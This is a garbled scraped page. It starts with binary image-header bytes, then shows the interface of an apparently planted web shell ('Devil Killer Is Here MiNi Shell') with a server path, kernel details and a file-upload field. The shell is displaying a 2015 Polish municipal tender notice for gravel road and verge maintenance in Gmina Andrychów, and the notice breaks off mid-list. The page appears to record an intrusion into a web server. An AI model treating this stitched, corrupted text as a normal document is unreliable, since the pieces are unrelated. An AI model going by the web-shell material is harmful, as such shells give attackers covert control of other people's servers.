JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150318/60430-N-2015.html

<p class="kh_header"><b>Andrychów: Utrzymanie dróg o nawierzchni kamiennej oraz poboczy na terenie Gminy Andrychów</b><br>
<b>Numer ogłoszenia: 60430 - 2015; data zamieszczenia: 18.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Andrychów reprezentowana przez Burmistrza , Rynek 15, 34-120 Andrychów, woj. małopolskie, tel. (0-33) 875-23-60, faks (0-33) 875-29-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.andrychow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie dróg o nawierzchni kamiennej oraz poboczy na terenie Gminy Andrychów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania pn.
Utrzymanie dróg o nawierzchni kamiennej oraz poboczy na terenie Gminy Andrychów.
Zakres przedmiotu zamówienia obejmuje:
a.  remonty dróg o nawierzchni kamiennej oraz poboczy na terenie Gminy Andrychów, a w tym: naprawę dróg gruntowo - żwirowych, naprawę nawierzchni tłuczniowej, ścinanie poboczy, uzupełnianie poboczy materiałem kamiennym lub korą asfaltową,
b. pracę sprzętu na potrzeby Gminy Andrychów, a w tym: koparko-ładowarka o minimalnej pojemności łyżki 1,2 m3, samochód samowyładowczy 6-12t, walec drogowy wibracyjny o masie min. 4t, równiarka,
c. dostawę materiałów kamiennych na teren Gminy Andrychów w miejsca wskazane przez Zamawiającego: kliniec drogowy o frakcji 0-31 mm, tłuczeń drogowy drobny o frakcji 10-31mm, tłuczeń drogowy gruby o frakcji 30-61 mm,
mieszanka o frakcji 0-63 mm.
Ww. dostawa obejmuje: zakup, dostawę materiałów w miejsca wskazane przez Zamawiającego wraz z ich rozładunkiem.
Materiały kamienne muszą spełniać wymagania normatywne w odniesieniu do PN-EN 13043 lub PNS-061027.
d. wykonanie innych prac niezbędnych do prawidłowego wykonania zamówienia, w tym między innymi: opracowanie projektu organizacji ruchu na czas prowadzenia robót, oznakowanie oraz zabezpieczenie terenu objętego zakresem prac, na czas ich wykonania, demontaż tymczasowego oznakowania, po zakończeniu robót, organizację dojść i dojazdów do posesji w trakcie prowadzenia robót,bieżący wywóz materiałów nieużytecznych z terenu robót, 
wykonanie ewentualnych robót naprawczych infrastruktury technicznej, której stan techniczny na skutek realizacji robót uległ pogorszeniu.
Przyjęte w przedmiarze ilości są szacunkowe, obrazują możliwą wielkość i zakres przedmiotu zamówienia.
Faktyczny zakres prac realizowany będzie w zależności od potrzeb Zamawiającego na podstawie zleceń cząstkowych. 
Zakres robót, o którym mowa w dziale III lit. a, będzie w całości realizowany z materiałów własnych oraz przy użyciu sprzętu Wykonawcy.
Szczegółowy opis i zakres przedmiotu zamówienia określony został w: 
1. specyfikacji technicznej wykonania i odbioru robót stanowiącej załącznik nr 7 do SIWZ
2. przedmiarze stanowiącym załącznik nr 8 do SIWZ.
Warunki realizacji przedmiotu zamówienia:
1. Wykonawca realizował będzie roboty na podstawie wystawianych przez Zamawiającego zleceń cząstkowych, z określeniem w nich zakresu, miejsca i terminu wykonania robót, zgodnie ze wzorem stanowiącym załącznik nr 9 do SIWZ.
2. Wykonawca realizował będzie dostawy na podstawie wystawianych przez Zamawiającego zleceń cząstkowych, z określeniem w nich lokalizacji dostawy, rodzaju i ilości materiału oraz terminu jej wykonania, według wzoru zlecenia stanowiącego załącznik nr 9 do SIWZ.
3. Wykonawca potwierdzając na kopii zlecenia cząstkowego jego odbiór przyjmuje określone  w nim roboty bądź dostawy na warunkach ustalonych w Specyfikacji Istotnych Warunków Zamówienia, oraz w specyfikacjach technicznych wykonania i odbioru robót.
4. Dopuszcza się możliwość udzielania zleceń cząstkowych w formie elektronicznej bądź pisemnej - faksem, których potwierdzenie odbioru jest równoznaczne z przyjęciem zleceń do realizacji.
5.Termin przystąpienia do wykonania zgłoszeń interwencyjnych nie może przekroczyć 2 godz. od momentu zgłoszenia przez Zamawiającego, w okresie całodobowym we wszystkie dni kalendarzowe.
6. Prace interwencyjne mają polegać na zabezpieczeniu terenu tak, aby umożliwić bezpieczną komunikację.
7. Termin rozpoczęcia robót bądź realizacji dostaw nie mających charakteru interwencyjnego nie może przekroczyć ... dni roboczych od momentu zgłoszenia przez Zamawiającego.
8. Terminy ustalone w zleceniu cząstkowym ulegają przesunięciu w przypadku wystąpienia opóźnień wynikających z :
przestojów i opóźnień zawinionych przez Zamawiającego,
działania sił wyższych klęski żywiołowe i inne mających bezpośredni wpływ na terminowość wykonania prac,
wystąpienia warunków atmosferycznych uniemożliwiających wykonanie prac, fakt ten musi mieć odzwierciedlenie w protokole konieczności i musi być potwierdzony przez Zamawiającego.
9. Termin zakończenia dla zlecenia cząstkowego będzie każdorazowo określany w zleceniu cząstkowym.
10. Ewidencja godzin pracy sprzętu, będzie sporządzana w formie raportów dziennych lub kart drogowych, które będą przedstawione Zamawiającemu celem akceptacji.
11. Raport dzienny lub karta drogowa będą zawierały:
miejsce wykonywania prac, rodzaj użytego sprzętu, ilość godzin pracy poszczególnego sprzętu, potwierdzenie wykonanych prac przez sołtysa, w przypadku robót wykonywanych na drogach gminnych na terenie danego sołectwa.
12. Dostawa materiałów, będzie realizowana sukcesywnie, transportem Wykonawcy, tj. samochodami dostawczymi o tonażach 6-12t na podstawie pisemnych zleceń cząstkowych wystawianych przez Zamawiającego.
13. Dostawa materiałów wraz z rozładunkiem nastąpi w miejscach i ilości wskazanych przez  Zamawiającego na terenie całej Gminy Andrychów i potwierdzana będzie każdorazowo przez Sołtysa, w przypadku dostawy wykonanej na drogach gminnych na terenie danego sołectwa..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających robót budowlanych w wysokości do 50 % wartości zamówienia podstawowego zgodnie z art. 67 ust. 1 pkt. 6 ustawy - Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.50.00.00-2, 14.21.22.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 10.000,00 zł słownie: dziesięć tysięcy złotych 00 groszy do dnia 2.04.2015r. do godz. 9:00. 2. Wadium może być wnoszone:
a) przelewem - wpłacane na rachunek Zamawiającego w ABS Banku Spółdzielczym w Andrychowie, nr rachunku: 82 8110 0000 2001 0000 1225 0002 z dopiskiem wadium: Utrzymanie dróg  o nawierzchni kamiennej oraz poboczy na terenie Gminy Andrychów  tak, aby przed upływem terminu składania ofert wadium znajdowało się na ww. rachunku.
Zaleca się dołączenie do oferty kopii dokumentu potwierdzającego dokonanie przelewu.
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007r. Nr 42, poz. 275 z późn. zm. - składane w oryginale w Urzędzie Miejskim w Andrychowie, Referat Księgowości Budżetowej, pok.120, za potwierdzeniem przyjęcia przed upływem terminu składania ofert lub załączone do oferty tj. w kopercie z ofertą, w takim przypadku zamawiający przekaże oryginał dokumentu stanowiącego wadium do w/w Referatu.
3. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
a) być wystawione na Gminę Andrychów, Rynek 15, 34-120 Andrychów,
b) zawierać w swojej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a  i 5 PZP,
c) okres ważności wadium nie może być krótszy niż okres związania ofertą.
4. Zamawiający zwróci wadium w sposób odpowiadający formie wnoszenia w przypadkach wymienionych w art. 46 ust 1, 1a oraz 2 PZP. W przypadku wpłaty przelewem Zamawiający zwróci kwotę wadium wraz z odsetkami wynikającymi z umowy prowadzenia rachunku, pomniejszoną  o koszty prowadzenia rachunku oraz o prowizje bankowe.
5. Zamawiający zatrzyma wadium w wypadku, gdy zajdzie jedna z okoliczności
 wymienionych w art. 46 ust. 4a lub 5 PZP.
6. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta  została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków na formularzu według wzoru jak w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże na formularzu według wzoru jak w załączniku nr 4 do SIWZ, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 2 roboty budowlane - każda o wartości nie niższej niż 90 000,00 zł brutto, porównywalne do przedmiotu zamówienia.
Dowodami są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze, Wykonawca nie jest w stanie uzyskać poświadczenia.  W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże na formularzu według wzoru jak w załączniku nr 6 do SIWZ, że dysponuje następującymi  narzędziami i sprzętem:
	- spycharka	- 1 szt.                                                                                                                                     	- koparka	- 1 szt.                                                                                                                                                      	- układarka lub równiarka do rozścielania tłucznia	- 1 szt.                                                          	- walec	- 1 szt.                                                                                                                      	- samochód dostawczy - 1 szt.                                                                                                                                                        	- koparko-ładowarka o minimalnej pojemności łyżki 1,2 m3 - 1 szt.                                                  	- samochód samowyładowczy min. 6t, 8t, 12t  - po 1 szt.                                                                                                                                                     	- walec drogowy wibracyjny o masie min. 4t  - 1 szt.
	- równiarka 	- 1 szt.
	- ładowarka 	- 1 szt.
	- ubijak ręczny - 1 szt.
	- ubijak mechaniczny - 1 szt.
	- zagęszczarka wibracyjna - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże (na formularzu według wzoru jak w załączniku nr 5 do SIWZ), że dysponuje lub będzie dysponował co najmniej jedna osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno - budowlanej bez ograniczeń z minimum 2-letnim doświadczeniem, odpowiadające wymaganiom w ustawie - Prawo budowlane lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub przepisów nie będących prawem krajowym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum             100 000,00 zł  w przypadku braku potwierdzenia w treści polisy dokonania opłaty, należy załączyć dokumenty, które będą potwierdzać dokonanie wpłaty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>C. Oprócz wyżej wymienionych oświadczeń i dokumentów oferta musi zawierać:
1. formularz ofertowy - według wzoru - załącznik nr 1 do SIWZ;
2. Listę podmiotów należących do tej samej grupy kapitałowej (w rozumieniu Ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Dz. U. Nr 50, poz. 331 z późn. zm.) w przypadku, gdy Wykonawca należy do grupy kapitałowej.
D. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotu zamówienia.
Pisemne zobowiązanie podmiotu trzeciego należy załączyć do oferty w formie oryginału, zawierające podpis podmiotu trzeciego pod treścią oświadczenia.
E. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów  dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.
F. Dotyczy Wykonawców składających wspólną ofertę: 
W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
Dokumenty, o których mowa w SIWZ dział VI pkt. A 1, 2, 3, 4, 5, 6 oraz pkt. C 1 składają wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub ich pełnomocnik.
Dokumenty, o których mowa w SIWZ dział VI pkt. B 1, 2, 3, 4 oraz pkt. C 2, składa we własnym imieniu   każdy z podmiotów wspólnie ubiegający się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin rozpoczęcia robót bądź realizacja dostaw nie mających charakteru interwencyjnego - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają wprowadzenie do treści niniejszej umowy istotnych zmian jej 	postanowień w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
	Zmiany te mogą dotyczyć:

1) terminu wykonania przedmiotu umowy w przypadku:
a)	wystąpienia niesprzyjających warunków atmosferycznych powodujących konieczność 	całkowitego przerwania robót bądź dostaw materiałów kamiennych, co zostanie potwierdzone 	przez Zamawiającego. Termin realizacji zadania zostanie przedłużony 	o taką ilość dni 	kalendarzowych, na jaką roboty  bądź dostawy zostały przerwane,
b)	niemożności rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu 	z przyczyn 	leżących po stronie Zamawiającego. Wówczas termin wykonania robót bądź 	dostaw ulega przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia robót 	bądź dostaw, 
c) wcześniejszego wykonania umowy przez Wykonawcę w związku z wyczerpaniem potrzeb 	Zamawiającego w zakresie objętym niniejszą umową.

2) sposobu wykonania przedmiotu umowy w przypadku:
a)	pojawienia się konieczności zmiany ilości poszczególnych elementów robót bądź dostaw, 	określonych w przedmiarze, 
b)	podjęcia przez osoby trzecie działań uniemożliwiających lub utrudniających wykonanie 	przedmiotu umowy w zakresie przewidzianym w specyfikacji technicznej wykonania                      	 i odbioru robót, które to działania nie są konsekwencją winy którejkolwiek ze stron umowy.

3) wysokości wynagrodzenia w przypadku:
a)	zmiany obowiązującej stawki podatku VAT,
b)	zmiany sposobu wykonania przedmiotu umowy na skutek wystąpienia okoliczności 	przewidzianych w pkt 2.

